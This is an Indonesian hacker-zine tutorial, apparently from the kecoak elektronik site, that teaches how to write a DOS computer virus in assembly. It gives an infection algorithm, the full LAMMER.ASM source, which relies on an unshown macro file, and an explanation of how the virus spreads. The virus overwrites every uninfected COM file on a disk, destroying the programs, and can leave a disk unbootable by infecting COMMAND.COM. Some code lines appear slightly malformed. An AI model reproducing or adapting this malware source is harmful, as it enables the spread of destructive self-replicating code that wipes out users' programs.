======================================================================== Pemerograman Virus Komputer Bagian II Author : Dr`Ponidi Edited by : SaMuRai_HaCk Dedication : For Knowledgement & Open Source Greetz : #DEFACE-TEAM@IRC.DAL.NET #DHEGLENG@IRC.DAL.NET Terbitan Online kecoak elektronik http://www.k-elektronik.org/ ======================================================================== 1. Pendahuluan Virus komputer yang akan dibicarakan dibawah ini ditulis dalam bahasa assembley.Bila dibandingkan dengan virus bacthfile, yang pernah kita bicarakan maka virus yang kita bahas sekarang ini telah memiliki kelima kemampuan seperti apa yang telah saya sampaikan terdahulu. Virus ini mampu mencari semua file COM yang ada pada disket, serta memeriksanya apakah telah tertular atau belum.Bila belum, maka virus akan menularinya.Routine manipulasi yang dimiliki virus ini hanyalah berupa tampilan pesan : "File ini telah tertular Virus komputer!" atau "Semua file COM pada disket ini telah tertular virus komputer!!!". Berbeda dengan virus batchfile yang menghasilkan file baru dan membutuhkan beberapa file untuk menjalankannya, maka virus yang akan kita bahas ini nantinya dapat bekerja sendiri dan tidak menghasilkan file baru, sehingga kemampuan menyembunyikan diri dari virus ini lebih baik. Seperti halnya virus batchfile, virus dibawah ini adalah termasuk jenis virus yang menumpangi program yang ditularinya.Dengan demikian virus ini bersifat merusak. 2. Algoritma Algoritma yang digunakan adalah sbb: 1. Cari file COM yang pertama 2. Buka dan baca file tersebut, letakkan pada buffer (di RAM) 3. Dengan membandingkan tanda pengenal virus dan rangkaian byte bagian awal dari program, periksa apakah file tersebut telah tertular virus atau belum. 4. a) Bila belum, maka tulari file tersebut dengan jalan menyalin seluruh program virus ke file tersebut (menumpangi).Kemudian tampilkan pesan :"File ini telah tertular Virus Komputer !" b) Bila sudah, maka carilah file COM berikutnya.Ulangi langkah 2. 5. Jika semua file COM telah tertular, maka tampilkan pesan : "semua file Com pada disket ini telah tertular virus komputer!!!" 3. Program dan Mekanisme Penularan Program dibawah ini merupakan implementasi dari bagian diatas. Catatan : Program virus ini menggunakan instruksi macro.Definisi macro yang digunakan terdapat pada file LAMMER.MAC. klo pengen liat file macronya kirim email ke Dr`Ponidi@crackdealer.com) ;------------------------------------------------------------------------------------ ; LAMMER.ASM ; ;CODE BY : #DEFACE-TEAM@IRC.DAL.NET ; #DHEGLENG@IRC.DAL.NET ; ;RETRIEVAL SYSTEM BY: DR`PONIDI@CRACKDEALER.COM ; ;VIRUS INI MENYERANG DAN MERUSAK SEMUA FILE COM. ;BERHATI-HATILAH! ;------------------------------------------------------------------------------------ IF1 INCLUDE LAMMER.MAC ENDIF Code_seg SEGMENT ASSUME CS:Code_seg ORG 100h Mulai : jmp kerjakan Identitas DB `File ini telah tertular virus komputer !$` Peringatan DB `semua file COM dalam disket ini telah tertular virus` DB `Komputer !!!$` File_COM DB`*.com`,0h Nama_file DB 13 DUP(?) Panjang_id equ 45 Panjang_vir equ 445 Atribut equ 20h Open_code equ 2 Jumlah equ 0ffffh DTA DB43 DUP(20h) Kerjakan : Set_DTA DTA Mov ax,0 Find_first file_COM,Atribut Masih_adakah:cmp ax,0 Je Laksanakan Cmp ax,2 Je Keluar Tulis_string peringatan Jmp Keluar Keluar : Ke_dos Laksanakan : mov si,offset DTA + 30 Pindahkan_string 13,nama_file Buka_file_DTA DTA,Open_code Push bx Baca_file bx,Buffer,jumlah Push ax Mov di,offset Buffer + 3 Bandingkan-string Identitas,panjang_id Cmp bx,0 Je Cari_lainnya Mov si,100h Pindahkan_string panjang_vir,Buffer Pop ax Pop bx Push ax Tutup_file bx Hapus_file Nama_file Buat_file Nama_file,Atribut Buka_file Nama_file,Open_code Pop ax Tulis_file bx,buffer,ax Tutup_file bx Tulis_string identitas Ke_dos Cari_lainnya : pop ax pop bx Tutup_file bx Find_next Jmp masih_adakah Buffer Label byte Code_seg ENDS END mulai 4. Penjelasan Awal dari penularan dimulai ketika program virus ini dijalankan pada disket yang berisi file-file COM.Virus mula-mula akan menulari file COM yang pertama (berdasarkan urutan file-file pada disket).Dengan penularan ini, maka file tersebut menjadi sumber penularan baru, dan virus yang asli dapat dihapus.File-file yang telah tertular ukurannya tidak berubah. Bila file yang telah tertular itu dijalankan, maka file itu tidak dapat menjalankan fungsinya dan hanya akan menampilkan pesan :"File ini telah tertular Virus komputer!".Sebelumnya, file tersebut akan menulari file COM lainnya. Bila kebetulan file .COM pertama yang diserang didalam directory utama adalah COMMAND.COM, maka setiap kali melakukan boot dengan disket itu, tak akan pernah berhasil dan sebelumnya virus akan menulari sebuah program COM lain yang belum tertular. Harapa diperhatikan bahwa virus ini tidak dapat bekerja dengan baik bila berada pada file COM yang ukurannya lebih kecil daripada ukuran program virus yang asli, atau terlalu besar (mendekati atau lebih dari FFFF heksadesimal = 64KB) Ini disebabkan karena program virus tidak dapat disalin secara lengkap atau buffer telah melampaui batas daerah CS (Code Segment) Demikianlah Artikel yang dapat saya sampaikan pada kesempatan ini, Semoga informasi yang saya sampaikan dapat bermanfaat bagi pengetahuan bagi kita semua ,khususnya bagi yang concern terhadap virus.Sekian terima kasih cao